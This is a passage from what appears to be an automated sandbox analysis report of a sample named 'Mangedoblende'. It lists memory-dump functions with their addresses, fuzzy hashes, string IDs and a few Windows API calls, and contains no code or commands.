                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Hiq$Hiq
                                                                                                                                                                            • API String ID: 0-2624443307
                                                                                                                                                                            • Opcode ID: beeb8332ff37f19d837046e86f1047c6873cf652495579eee803b26d1ad9a930
                                                                                                                                                                            • Instruction ID: f583011abaf52ad906acc5e2e528ffdab6990cb7208d0207202da4e799b006b7
                                                                                                                                                                            • Opcode Fuzzy Hash: beeb8332ff37f19d837046e86f1047c6873cf652495579eee803b26d1ad9a930
                                                                                                                                                                            • Instruction Fuzzy Hash: 5591BE703046158FCB15AF28C898A6E7BB2BFC9300F148569E446CB396DF38CE42DB91
                                                                                                                                                                            Function 2283E950 Relevance: 2.7, Strings: 2, Instructions: 239COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: LReq$LReq
                                                                                                                                                                            • API String ID: 0-1701832695
                                                                                                                                                                            • Opcode ID: df2baf6dd1e72aa47d20400d80b7604f6c6e1e5a5d60a0190c4bd89518e761fa
                                                                                                                                                                            • Instruction ID: 076bbf1ff7527a12b8022d4b032951025f95e16971d2a3f2c1dfa909e402691c
                                                                                                                                                                            • Opcode Fuzzy Hash: df2baf6dd1e72aa47d20400d80b7604f6c6e1e5a5d60a0190c4bd89518e761fa
                                                                                                                                                                            • Instruction Fuzzy Hash: 80816B39B00205CFCB06DF78DA95A5E77F6AF89604B1181A9E509DB3A1EA34DD01CB91
                                                                                                                                                                            Function 00186498 Relevance: 2.7, Strings: 2, Instructions: 197COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: ,iq$,iq
                                                                                                                                                                            • API String ID: 0-3242339887
                                                                                                                                                                            • Opcode ID: 6adc3b45665f0851e6769b975b60305f43372001204cac7683336d4196ecd4f4
                                                                                                                                                                            • Instruction ID: 535a52d591135ef926fe0c6429059da909e84273c75e5d905920fb95caf11f8d
                                                                                                                                                                            • Opcode Fuzzy Hash: 6adc3b45665f0851e6769b975b60305f43372001204cac7683336d4196ecd4f4
                                                                                                                                                                            • Instruction Fuzzy Hash: AE718174E00905CFCB18EF69C48496EBBB2BF89311B258169D415EB369EB31EE41CF51
                                                                                                                                                                            Function 00183CC0 Relevance: 2.6, Strings: 2, Instructions: 112COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: Xiq$Xiq
                                                                                                                                                                            • API String ID: 0-733771754
                                                                                                                                                                            • Opcode ID: 139130917abf41189492b14975d49b22e448489d486f6746ecda1395316c181a
                                                                                                                                                                            • Instruction ID: 5c4da77ef24e3eb3cdf8f3acfbfd283a88d4a98fd9e24cbe3592483d1f77f85e
                                                                                                                                                                            • Opcode Fuzzy Hash: 139130917abf41189492b14975d49b22e448489d486f6746ecda1395316c181a
                                                                                                                                                                            • Instruction Fuzzy Hash: 3431F77570422447DF1C6AA9889427EB6A6ABC4710F6C463AD826D3390EFB4CF415BA1
                                                                                                                                                                            Function 00188EF8 Relevance: 2.6, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: $eq$$eq
                                                                                                                                                                            • API String ID: 0-2246304398
                                                                                                                                                                            • Opcode ID: 766c814c9ba399410418d565b0b313a4bec3f6c4e3c47f75f0ddc0865f774d59
                                                                                                                                                                            • Instruction ID: 3b5c743d51f62271773981c2ce328dc9c69b3cb9664c4722fbbbf4e95cb58106
                                                                                                                                                                            • Opcode Fuzzy Hash: 766c814c9ba399410418d565b0b313a4bec3f6c4e3c47f75f0ddc0865f774d59
                                                                                                                                                                            • Instruction Fuzzy Hash: 9B3195713041228FCB2AAB79C85463E7767FF84710BA5446AF512CB292EF28ED40CF95
                                                                                                                                                                            Function 00189D56 Relevance: 2.5, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq$4'eq
                                                                                                                                                                            • API String ID: 0-907361030
                                                                                                                                                                            • Opcode ID: 67738ac42890e25857de13c987f07a1526c9f90f8b7c08127320db2ae6ef3754
                                                                                                                                                                            • Instruction ID: 67f6c1ca565b47490bf70a9c8f0f4c013a793b069a5428057fadfa1523a23674
                                                                                                                                                                            • Opcode Fuzzy Hash: 67738ac42890e25857de13c987f07a1526c9f90f8b7c08127320db2ae6ef3754
                                                                                                                                                                            • Instruction Fuzzy Hash: B0F036363001146FDB096AE5985097FBBDBEBDC360B144529F90AC7351DF61CD1187A1
                                                                                                                                                                            Function 00180CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: LReq
                                                                                                                                                                            • API String ID: 0-2687900687
                                                                                                                                                                            • Opcode ID: 11e20053988acd3011cd94c5d93e3c36ef4d5dc95747018c2d55270f26c315f4
                                                                                                                                                                            • Instruction ID: ab32f0b185453682d05dbb3880a8f7dccbd787f3fd14430fb13e36d863f08eb6
                                                                                                                                                                            • Opcode Fuzzy Hash: 11e20053988acd3011cd94c5d93e3c36ef4d5dc95747018c2d55270f26c315f4
                                                                                                                                                                            • Instruction Fuzzy Hash: AD525C74A04A19CFCB55DF28CD84A9DBBB6FF49301F1045A9E809A7361DB382E85DF80
                                                                                                                                                                            Function 0018A4E0 Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (oeq
                                                                                                                                                                            • API String ID: 0-952175256
                                                                                                                                                                            • Opcode ID: 93a9f4d5251dedbc4010696f40ace4dff4ce7ea56538cf3361c06364c2300d1c
                                                                                                                                                                            • Instruction ID: f7fc2e06e28066d3a1968e08cf5f662cf3eb37f7e9be094bad6219232b876ca1
                                                                                                                                                                            • Opcode Fuzzy Hash: 93a9f4d5251dedbc4010696f40ace4dff4ce7ea56538cf3361c06364c2300d1c
                                                                                                                                                                            • Instruction Fuzzy Hash: D7027130A00505CFDB19EF68C684A6EBBF2FF88300F658556E4069B6A5D734EE81CF52
                                                                                                                                                                            Function 22936CE4 Relevance: 1.6, APIs: 1, Instructions: 117COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 22936E02
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351450437.0000000022930000.00000040.00000800.00020000.00000000.sdmp, Offset: 22930000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22930000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                                                            • Opcode ID: 107b9e0cb853848f54f972e0617aec05f1ea3d7886c763e9a454852696fb48c8
                                                                                                                                                                            • Instruction ID: dcaba9595d3dda1647a606344431efbcdfe35a4ae613865932f0dbcdf81d21de
                                                                                                                                                                            • Opcode Fuzzy Hash: 107b9e0cb853848f54f972e0617aec05f1ea3d7886c763e9a454852696fb48c8
                                                                                                                                                                            • Instruction Fuzzy Hash: 3D51D0B1D10309DFDB15CFA9C984ADEBFB5BF88304F64822AE818AB210D7749845CF90
                                                                                                                                                                            Function 22936CF0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 22936E02
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351450437.0000000022930000.00000040.00000800.00020000.00000000.sdmp, Offset: 22930000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22930000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                                                            • Opcode ID: 4901253f4d08789d62b5b189d52a19a6118abb1e669d4633b7cf84a44baac214
                                                                                                                                                                            • Instruction ID: 4ac7716a98afad401b3989c77e70b8a2607790a31b6d8fc335ed302f87e9c216
                                                                                                                                                                            • Opcode Fuzzy Hash: 4901253f4d08789d62b5b189d52a19a6118abb1e669d4633b7cf84a44baac214
                                                                                                                                                                            • Instruction Fuzzy Hash: 0641BEB1D10309DFDB15CFAAC984ADEBBF5BF88314F60812AE818AB210D7749945CF94
                                                                                                                                                                            Function 229343F4 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 229394F1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351450437.0000000022930000.00000040.00000800.00020000.00000000.sdmp, Offset: 22930000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22930000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CallProcWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2714655100-0
                                                                                                                                                                            • Opcode ID: 4e3b662087e9bc11d96ca235fda0aa13782a95dff1ff01afcf4c8ad7e00991c2
                                                                                                                                                                            • Instruction ID: d65c33385b31751fc351a6e5a4947d31a313272b26854b39e572cd4ea9834eca
                                                                                                                                                                            • Opcode Fuzzy Hash: 4e3b662087e9bc11d96ca235fda0aa13782a95dff1ff01afcf4c8ad7e00991c2
                                                                                                                                                                            • Instruction Fuzzy Hash: 3C4137B5900305CFDB15CF99C988B9ABBF5FF88314F24C599D919AB321D374A941CBA0
                                                                                                                                                                            Function 2293BA10 Relevance: 1.6, APIs: 1, Instructions: 76comCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 2293B9CD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351450437.0000000022930000.00000040.00000800.00020000.00000000.sdmp, Offset: 22930000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22930000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Initialize
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                                                            • Opcode ID: 9454e21ebb328240c3284d247c52c2059c05f48d9009f5248053565935740413
                                                                                                                                                                            • Instruction ID: 09e83ca62a0b5e8b032094452fd7c8c5dc28ac912e15cd88d3fd0a975e56b3a6
                                                                                                                                                                            • Opcode Fuzzy Hash: 9454e21ebb328240c3284d247c52c2059c05f48d9009f5248053565935740413
                                                                                                                                                                            • Instruction Fuzzy Hash: E43166B6904249CFCB10DF9AD4847DEFBF4EF88324F20855AD558A7210C378A945CFA1
                                                                                                                                                                            Function 229CC228 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 229CC2B7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351565896.00000000229C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 229C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_229c0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                            • Opcode ID: 4b23002b0ecebf34f33b4374c79e18edf5a54304aeea0d658607798a73d24a23
                                                                                                                                                                            • Instruction ID: 911bb5f19f62c59155becb0e2f368534c0f4fad96dba7d5ddb60936536e5eb3d
                                                                                                                                                                            • Opcode Fuzzy Hash: 4b23002b0ecebf34f33b4374c79e18edf5a54304aeea0d658607798a73d24a23
                                                                                                                                                                            • Instruction Fuzzy Hash: FA2105B59002499FDB10CFAAD984AEEFFF4EF48310F14845AE954A7350C378A940DF65
                                                                                                                                                                            Function 229CC230 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 229CC2B7
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351565896.00000000229C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 229C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_229c0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                            • Opcode ID: f99108567b822f0ca61359e3b0802901a04755cef1a7b3cf59919122fdd4be7a
                                                                                                                                                                            • Instruction ID: ed3d0aa13c4a9b47705fd9a36a1ba95963f92541abe8b89c3aa368e2181080b1
                                                                                                                                                                            • Opcode Fuzzy Hash: f99108567b822f0ca61359e3b0802901a04755cef1a7b3cf59919122fdd4be7a
                                                                                                                                                                            • Instruction Fuzzy Hash: FF21E3B59002089FDB10CFAAD984ADEBFF8EB48320F14845AE914A7350D374A940DFA5
                                                                                                                                                                            Function 225B992C Relevance: 1.6, APIs: 1, Instructions: 62libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LdrInitializeThunk.NTDLL(00000000), ref: 225B9A6E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3350834195.00000000225B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 225B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_225b0000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                                                            • Opcode ID: b0b20451e5f27ef846d158850782fda060549b7ddc2e27e874d59a83f6dc00dd
                                                                                                                                                                            • Instruction ID: fd326b9648022a741eec9f9648f7bf2c7a06ad964a6667211f1b8c5592079ff8
                                                                                                                                                                            • Opcode Fuzzy Hash: b0b20451e5f27ef846d158850782fda060549b7ddc2e27e874d59a83f6dc00dd
                                                                                                                                                                            • Instruction Fuzzy Hash: FF116A74E042098FDB14DFA8D884EADBBB5FF89308F10C669E804A724AD774AA41CF10
                                                                                                                                                                            Function 2293AAE0 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 2293B9CD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351450437.0000000022930000.00000040.00000800.00020000.00000000.sdmp, Offset: 22930000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22930000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Initialize
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                                                            • Opcode ID: cff75927cb7aa91ce31986c03d959c9316b1d1f028af4f0b6a19f944b2cd769d
                                                                                                                                                                            • Instruction ID: d522aa11034055658ec512d3dc4ebe25d923dd467f2b61d3817c2d2949f20944
                                                                                                                                                                            • Opcode Fuzzy Hash: cff75927cb7aa91ce31986c03d959c9316b1d1f028af4f0b6a19f944b2cd769d
                                                                                                                                                                            • Instruction Fuzzy Hash: A71103B5904348CFCB10DF9AD585B9EBBF8EB48324F208559D558A7200D378A944CBA5
                                                                                                                                                                            Function 2293B970 Relevance: 1.5, APIs: 1, Instructions: 45comCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 2293B9CD
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351450437.0000000022930000.00000040.00000800.00020000.00000000.sdmp, Offset: 22930000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22930000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Initialize
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                                                            • Opcode ID: 4a3bcdae51c8d3de64442f63338aa3bea2e24bc031427af8a6fcebbd38c92ffc
                                                                                                                                                                            • Instruction ID: 406f2f497fb48de31f78a0154c64ab48877d532368fe78743ffa3b91aad1bbc0
                                                                                                                                                                            • Opcode Fuzzy Hash: 4a3bcdae51c8d3de64442f63338aa3bea2e24bc031427af8a6fcebbd38c92ffc
                                                                                                                                                                            • Instruction Fuzzy Hash: EB1130B59042498FCB10DFAAC984BCEBFF4EF48324F24895AD558A7210C378A944CBA1
                                                                                                                                                                            Function 0018AEFC Relevance: 1.4, Strings: 1, Instructions: 122COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: (oeq
                                                                                                                                                                            • API String ID: 0-952175256
                                                                                                                                                                            • Opcode ID: e32297949f4dea0c3e2f006b19acfb47df99b414dcf88e97fc4a656ffdd34c99
                                                                                                                                                                            • Instruction ID: 15bcc5e4d258495212705c5fb35135fd01558bf90bee13971ffc22cfa701e831
                                                                                                                                                                            • Opcode Fuzzy Hash: e32297949f4dea0c3e2f006b19acfb47df99b414dcf88e97fc4a656ffdd34c99
                                                                                                                                                                            • Instruction Fuzzy Hash: 3D41DF31B042149FCB19AF69C854AAEBBF6AFCD310F24446AE916D7391CF359D01CBA1
                                                                                                                                                                            Function 0018AA90 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: 4'eq
                                                                                                                                                                            • API String ID: 0-1552367303
                                                                                                                                                                            • Opcode ID: bfefd150929abd821b051f55170d35565d2e15195def71f5dc92e2a5e2b866eb
                                                                                                                                                                            • Instruction ID: 8ec38943b93e8e6c3574b33194f8b04e7d14321ee54c3b405d84b98646cdae98
                                                                                                                                                                            • Opcode Fuzzy Hash: bfefd150929abd821b051f55170d35565d2e15195def71f5dc92e2a5e2b866eb
                                                                                                                                                                            • Instruction Fuzzy Hash: A54138756001059FDB15EF28C988AAE7BB6FF48310F51006AE905CB3A1CB34DE51CF92
                                                                                                                                                                            Function 00182790 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: F
                                                                                                                                                                            • API String ID: 0-2730988801
                                                                                                                                                                            • Opcode ID: 8f553a87c8c89e9d1c2c98e9391fe554acd755e7c589a72ec47b94ae125991c2
                                                                                                                                                                            • Instruction ID: 7fe5f13611209b11988d62856e593eb77b4179bf625d898b635f9abdac0444f7
                                                                                                                                                                            • Opcode Fuzzy Hash: 8f553a87c8c89e9d1c2c98e9391fe554acd755e7c589a72ec47b94ae125991c2
                                                                                                                                                                            • Instruction Fuzzy Hash: DD313A74D092498FCB06EFA9C8446EDBFF5EF4A301F1041AAD844A7261EB341A95DFA1
                                                                                                                                                                            Function 0018E018 Relevance: .6, Instructions: 647COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 03ac6abf71c55b595f6239badd6259c51739fa2b285c7f171ff9da8260d9e786
                                                                                                                                                                            • Instruction ID: ec7819c0a70963cb651c57b373b59c470264998ba66593ef99881c685282615e
                                                                                                                                                                            • Opcode Fuzzy Hash: 03ac6abf71c55b595f6239badd6259c51739fa2b285c7f171ff9da8260d9e786
                                                                                                                                                                            • Instruction Fuzzy Hash: E31299380A1653DFE2412F25D6EC26EBA71FF4F323365AD06F10BC6054AB791469DB22
                                                                                                                                                                            Function 0018A0F8 Relevance: .2, Instructions: 215COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 5f14d984664faf3209f85bbd08048ffef4d08e4da8c804f2f586732e9e607461
                                                                                                                                                                            • Instruction ID: 2ae2b3f0dbe1193015a2816d183505a3de459ed950d0c32480d748fad0e0c52f
                                                                                                                                                                            • Opcode Fuzzy Hash: 5f14d984664faf3209f85bbd08048ffef4d08e4da8c804f2f586732e9e607461
                                                                                                                                                                            • Instruction Fuzzy Hash: 25919B74A00609DFCF25DF98C4848EDBBB2FF88310F51856AE815AB225D735AA55CF50
                                                                                                                                                                            Function 001880D8 Relevance: .2, Instructions: 201COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3333182721.0000000000180000.00000040.00000800.00020000.00000000.sdmp, Offset: 00180000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_180000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: f1a5429aa656dc670b61228a7bd5ca9622f303d65a877c9ba1c74111563aeeae
                                                                                                                                                                            • Instruction ID: 4866591542d381669eba66ec12eee6a0ff8071aa3d36166e0e0404ad7329ff47
                                                                                                                                                                            • Opcode Fuzzy Hash: f1a5429aa656dc670b61228a7bd5ca9622f303d65a877c9ba1c74111563aeeae
                                                                                                                                                                            • Instruction Fuzzy Hash: 387139347006198FCB25EF68C888A6E7BE6AF99341B5900A9E816DB371DF74DD41CF50
                                                                                                                                                                            Function 2283D700 Relevance: .2, Instructions: 174COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0ab0d96d2d7809da387dfb78593edb912a91c620844ffbf23ccaad52b2e6f226
                                                                                                                                                                            • Instruction ID: ca1c89798279b7a8d544bcc941f6ecec7016f03014ae7cb872337ffbb9893bf8
                                                                                                                                                                            • Opcode Fuzzy Hash: 0ab0d96d2d7809da387dfb78593edb912a91c620844ffbf23ccaad52b2e6f226
                                                                                                                                                                            • Instruction Fuzzy Hash: C2819274E412288FDB65DF25CD51BDDBBB2AF89300F1080EAE958A7260DB315E81CF40
                                                                                                                                                                            Function 2283D410 Relevance: .2, Instructions: 171COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000006.00000002.3351054478.0000000022830000.00000040.00000800.00020000.00000000.sdmp, Offset: 22830000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_6_2_22830000_Mangedoblende.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 0da45a7c9ed582d2a93eb632c04c2494716478e2ad9db62b896a534636d1af59
                                                                                                                                                                            • Instruction ID: c24c007c1252f3ef7120b847179f4f6cc0e65ae7067cf93ebd0d971cc003cea2
